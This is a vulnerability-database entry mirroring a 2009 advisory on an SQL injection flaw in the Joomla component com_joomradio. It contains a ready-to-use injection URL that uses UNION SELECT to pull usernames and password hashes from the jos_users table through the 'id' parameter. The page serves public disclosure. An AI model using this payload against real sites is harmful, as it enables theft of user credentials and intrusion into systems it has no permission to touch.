Joomla Component com_joomradio SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052180 漏洞类型
发布时间 2009-02-19 更新时间 2009-02-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020041
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###########################################################################
# Advisory X
# Title: Joomla Component com_joomradio SQL Injection
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: arturo_zamora_c_at_hotmail.com
# Website: www.securitybroken.com
# Date: 18/02/09
# Risk: Medium
# Vendor Url: http://ajaxportal.eu/
# Affected Software: JoomRadio
# autor script:author XrByte <info_at_exp&#46;ee>, Grusha <grusha_at_feellove&#46;eu>
##################################################################
#
#Example:
##################################################################
#htp://
victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION
SELECT
user(),concat(username,0x3a,password),user(),user(),user(),user(),user()
FROM jos_users--
#
##################################################################
#greetz:
#
# original advisorie: http://www.securitybroken.com
##################################################################